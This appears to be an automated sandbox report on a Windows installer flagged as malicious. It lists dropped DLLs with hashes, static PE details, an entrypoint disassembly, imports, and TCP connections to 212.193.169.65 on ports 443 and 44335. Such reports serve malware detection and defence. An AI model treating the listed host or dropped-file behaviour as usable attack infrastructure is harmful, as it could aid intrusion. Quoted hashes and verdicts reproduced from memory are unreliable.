                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z%...K..K..K..sH..K..sN...K..sO..K.4....K..sN..K..sO..K..sH..K..sJ..K..J.k.K..rO.>.K..rK..K..r...K.....K..rI..K.Rich..K.................PE..L......_...........!......................................................................@.............................0...0...x....@.......................P...H......................................@............................................text...D........................... ..`.rdata..ZQ.......R..................@..@.data...x+..........................@....rsrc........@......................@..@.reloc...H...P...J..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\libeay32.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1388688
                                                                                                                                          Entropy (8bit):6.85745413435775
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                                          MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                                          SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                                          SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                                          SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......lU.*(4.y(4.y(4.y!L<y.4.y!L-y34.y(4.y.4.y...y#4.y(4.y=4.y!L;y.6.y!L*y)4.y!L,y)4.y!L)y)4.yRich(4.y................PE..L...#..]...........!.................................................................:...............................A.......6..x.......0...........................p...................................@...............(............................text............................... ..`.rdata..XY.......Z..................@..@.data............t..................@....rsrc...0............Z..............@..@.reloc..,............`..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\libjpeg-turbo-win.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):713456
                                                                                                                                          Entropy (8bit):6.620067101616198
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                                          MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                                          SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                                          SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                                          SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..k...k...k....%B.b....%@....%A.r...P..z...P..}...P..d...Fx.h...k...=...k...J......Y......j.....L.j...k.$.j......j...Richk...........PE..L...Q.xX...........!.........$.......P....................................... ............@.........................0....... ...(.......@........................8..0p..p............................p..@...............\............................text...9........................... ..`.rdata..............................@..@.data...(...........................@....gfids..d...........................@..@.rsrc...@...........................@..@.reloc...8.......:..................@..B................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\libssl-1_1.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):541880
                                                                                                                                          Entropy (8bit):5.766958615909
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                                          MD5:753B75570811052953F336261E3031BB
                                                                                                                                          SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                                          SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                                          SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L.....7a...........!.........................................................p............@..........................)...N........... ..s............ ...$...0...5......8...........................H...@............................................text............................... ..`.rdata...g.......h..................@..@.data....;.......6...`..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..`=...0...>..................@..B................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\msvcr120.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):970912
                                                                                                                                          Entropy (8bit):6.9649735952029515
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                          MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                          SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                          SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                          SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\opus.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):370488
                                                                                                                                          Entropy (8bit):6.86993159214619
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                                          MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                                          SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                                          SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                                          SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k-...~...~...~.......~....l..~.......~.......~.......~.......~.......~...~...~]...k..~]......~]..~...~]......~Rich...~........PE..L....g._.........."!.................U....... ...................................... .....@..........................^......\h..(.......................8.......l....W...............................W..@............ ...............................text............................... ..`.rdata..6N... ...P..................@..@.data...8....p.......^..............@....rsrc................h..............@..@.reloc..l............j..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\template\quartz.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1073767936
                                                                                                                                          Entropy (8bit):4.300012443222872E-4
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:
                                                                                                                                          MD5:C8AD6A4A50181E2DD95951BE4C2C54E1
                                                                                                                                          SHA1:8B7375158EE606D455295D0A34901BC05DEE0665
                                                                                                                                          SHA-256:DF6843408E914A00A2A4BF93068031E77023089E38031A3E5E99B0F420686ECA
                                                                                                                                          SHA-512:59CA02AD50E7D5FBD2DEE8295584AB643F8716ADE58352583A60EBA641012EA814D60247452D423CDB9FA05C5A79903184FFECFE615AE37DD2ACF8722E3E0952
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L...@.a...........!...I.F...................`.......................................]....@..........................................p..L.......................d....................................................................................code...`E.......F.................. ..`.data........`.......J..............@....rsrc...L....p.......X..............@....edata...............^..............@..@.rdata...............`..............@..@.reloc..d............b..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):7.970819679785949
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          File name:aeyh21MAtA.exe
                                                                                                                                          File size:7'234'714 bytes
                                                                                                                                          MD5:91444fbf43fbbb75b12dc51f3b5465ea
                                                                                                                                          SHA1:1c81094998d5afa6c09ebd3ee14c4d99b56d729f
                                                                                                                                          SHA256:21bc348816742321a937e95b1a4b6a57d285c143cc920a2e95c236467123e56f
                                                                                                                                          SHA512:4a1bedcaf4f80065dbb89125a245897a32db7bc00a0145dcf23881c90952afc5f86bb280ddda627de9518912492d7b92785fac1660ae30d826f950e4825d4a58
                                                                                                                                          SSDEEP:196608:y04d2RBrM9w5oM+HfNmaHoipZIH0nrgZAk3Cc/8JY1:l4yu9wpifNm+oc9r413B/QM
                                                                                                                                          TLSH:7A7623C2A186C5B5E86A0431D9364CF42E522C6DD4E5192B1DBCFE1C7AB73C204BBE5B
                                                                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:81654d9181010156

                                                                                                                                          Static PE Info

                                                                                                                                          General

                                                                                                                                          Entrypoint:0x416478
                                                                                                                                          Entrypoint Section:.itext
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x506A75C4 [Tue Oct 2 05:04:04 2012 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:5
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:5
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:5
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:483f0c4259a9148c34961abbda6146c1

                                                                                                                                          Entrypoint Preview

                                                                                                                                          Instruction
                                                                                                                                          push ebp
                                                                                                                                          mov ebp, esp
                                                                                                                                          add esp, FFFFFFA4h
                                                                                                                                          push ebx
                                                                                                                                          push esi
                                                                                                                                          push edi
                                                                                                                                          xor eax, eax
                                                                                                                                          mov dword ptr [ebp-3Ch], eax
                                                                                                                                          mov dword ptr [ebp-40h], eax
                                                                                                                                          mov dword ptr [ebp-5Ch], eax
                                                                                                                                          mov dword ptr [ebp-30h], eax
                                                                                                                                          mov dword ptr [ebp-38h], eax
                                                                                                                                          mov dword ptr [ebp-34h], eax
                                                                                                                                          mov dword ptr [ebp-2Ch], eax
                                                                                                                                          mov dword ptr [ebp-28h], eax
                                                                                                                                          mov dword ptr [ebp-14h], eax
                                                                                                                                          mov eax, 004152B8h
                                                                                                                                          call 00007F824CE4AF01h
                                                                                                                                          xor eax, eax
                                                                                                                                          push ebp
                                                                                                                                          push 00416B45h
                                                                                                                                          push dword ptr fs:[eax]
                                                                                                                                          mov dword ptr fs:[eax], esp
                                                                                                                                          xor edx, edx
                                                                                                                                          push ebp
                                                                                                                                          push 00416B01h
                                                                                                                                          push dword ptr fs:[edx]
                                                                                                                                          mov dword ptr fs:[edx], esp
                                                                                                                                          mov eax, dword ptr [0041AB48h]
                                                                                                                                          call 00007F824CE597ABh
                                                                                                                                          call 00007F824CE59352h
                                                                                                                                          lea edx, dword ptr [ebp-14h]
                                                                                                                                          xor eax, eax
                                                                                                                                          call 00007F824CE52FD4h
                                                                                                                                          mov edx, dword ptr [ebp-14h]
                                                                                                                                          mov eax, 0041D6ECh
                                                                                                                                          call 00007F824CE49537h
                                                                                                                                          push 00000002h
                                                                                                                                          push 00000000h
                                                                                                                                          push 00000001h
                                                                                                                                          mov ecx, dword ptr [0041D6ECh]
                                                                                                                                          mov dl, 01h
                                                                                                                                          mov eax, dword ptr [0040F080h]
                                                                                                                                          call 00007F824CE538BFh
                                                                                                                                          mov dword ptr [0041D6F0h], eax
                                                                                                                                          xor edx, edx
                                                                                                                                          push ebp
                                                                                                                                          push 00416AADh
                                                                                                                                          push dword ptr fs:[edx]
                                                                                                                                          mov dword ptr fs:[edx], esp
                                                                                                                                          call 00007F824CE59833h
                                                                                                                                          mov dword ptr [0041D6F8h], eax
                                                                                                                                          mov eax, dword ptr [0041D6F8h]
                                                                                                                                          cmp dword ptr [eax+0Ch], 01h
                                                                                                                                          jne 00007F824CE5AB9Ah
                                                                                                                                          mov eax, dword ptr [0041D6F8h]
                                                                                                                                          mov edx, 00000028h
                                                                                                                                          call 00007F824CE53D88h
                                                                                                                                          mov edx, dword ptr [0041D6F8h]

                                                                                                                                          Data Directories

                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1e0000xf9e.idata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x210000x4b7e4.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x200000x18.rdata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x1e3500x24c.idata
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                          Sections

                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                          .text0x10000x143f80x14400345db2b6911addc85b53f32245f969a0False0.5487316743827161data6.482204165609409IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .itext0x160000xbe80xc002e74d968caedeb2d71b9505530d43907False0.6243489583333334data6.0151573487586IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                          .data0x170000xd9c0xe00d5b22eff9e08edaa95f493c1a71158c0False0.2924107142857143data2.669288666959085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .bss0x180000x57500x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .idata0x1e0000xf9e0x1000b47eaca4c149ee829de76a342b5560d5False0.35595703125data4.9677831942996935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .tls0x1f0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                          .rdata0x200000x180x2003746f5876803f8f30db5bb2deb8772aeFalse0.05078125data0.190488766434666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                          .rsrc0x210000x4b7e40x4b800cf0453380960751e2144176aa94c1d7fFalse0.2783429480546358data5.429379445497465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                          Resources

                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                          RT_ICON0x2138c0x4180cDevice independent bitmap graphic, 255 x 510 x 32, image size 260100, resolution 3779 x 3779 px/mEnglishUnited States0.2926872903466269
                                                                                                                                          RT_STRING0x62b980xc4data0.5969387755102041
                                                                                                                                          RT_STRING0x62c5c0xccdata0.6225490196078431
                                                                                                                                          RT_STRING0x62d280x174data0.5510752688172043
                                                                                                                                          RT_STRING0x62e9c0x39cdata0.34523809523809523
                                                                                                                                          RT_STRING0x632380x34cdata0.4218009478672986
                                                                                                                                          RT_STRING0x635840x294data0.4106060606060606
                                                                                                                                          RT_RCDATA0x638180x82e8dataEnglishUnited States0.11261637622344235
                                                                                                                                          RT_RCDATA0x6bb000x10data1.5
                                                                                                                                          RT_RCDATA0x6bb100x1b0data0.8194444444444444
                                                                                                                                          RT_RCDATA0x6bcc00x2cdata1.1590909090909092
                                                                                                                                          RT_GROUP_ICON0x6bcec0x14dataEnglishUnited States1.2
                                                                                                                                          RT_VERSION0x6bd000x4b8COM executable for DOSEnglishUnited States0.26158940397350994
                                                                                                                                          RT_MANIFEST0x6c1b80x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                                                          Imports

                                                                                                                                          DLLImport
                                                                                                                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                          advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                                          user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                                                                                          kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                                                                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                                                                                          user32.dllCreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
                                                                                                                                          kernel32.dllWriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, LeaveCriticalSection, InitializeCriticalSection, GetWindowsDirectoryW, GetVersionExW, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
                                                                                                                                          advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
                                                                                                                                          comctl32.dllInitCommonControls
                                                                                                                                          kernel32.dllSleep
                                                                                                                                          advapi32.dllAdjustTokenPrivileges
                                                                                                                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit

                                                                                                                                          Possible Origin

                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          EnglishUnited States

                                                                                                                                          Network Behavior

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Nov 19, 2024 18:57:08.388916016 CET49977443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:08.388982058 CET44349977212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:08.389046907 CET49977443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:08.453202963 CET49977443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:08.453249931 CET44349977212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:09.192563057 CET44349977212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:09.192627907 CET49977443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:09.194227934 CET49977443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:09.194236994 CET44349977212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:09.194602966 CET44349977212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:09.197498083 CET49977443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:09.215569019 CET49977443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:09.215708971 CET49977443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:09.215895891 CET44349977212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:09.216094017 CET44349977212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:09.216126919 CET44349977212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:09.216176987 CET49977443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:09.216217041 CET49977443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:09.225085974 CET49980443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:09.225128889 CET44349980212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:09.225343943 CET49980443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:09.225868940 CET49980443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:09.225884914 CET44349980212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.027859926 CET44349980212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.027959108 CET49980443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.029860020 CET49980443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.029875994 CET44349980212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.030126095 CET44349980212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.031213999 CET49980443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.031358004 CET44349980212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.031378984 CET44349980212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.031404972 CET49980443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.031419039 CET44349980212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.031461954 CET49980443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.031462908 CET49980443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.031483889 CET49980443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.048743963 CET4998344335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.053674936 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.053774118 CET4998344335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.054439068 CET4998344335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.059201956 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.757302999 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.757386923 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.757419109 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.757472992 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.757503033 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.757529974 CET4998344335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.811542988 CET4998344335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.844501972 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:10.855068922 CET4998344335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:10.860222101 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:11.077092886 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:11.078113079 CET4998344335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:11.079375029 CET4998344335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:11.079773903 CET4998344335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:11.083267927 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:11.084472895 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:11.085170984 CET4433549983212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:11.085551977 CET4998344335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:11.101593018 CET49986443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:11.101650000 CET44349986212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:11.101800919 CET49986443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:11.102793932 CET49986443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:11.102804899 CET44349986212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:11.840290070 CET44349986212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:11.840377092 CET49986443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:11.882349968 CET49986443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:11.882363081 CET44349986212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:11.882703066 CET44349986212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:11.883594036 CET49986443192.168.2.5212.193.169.65
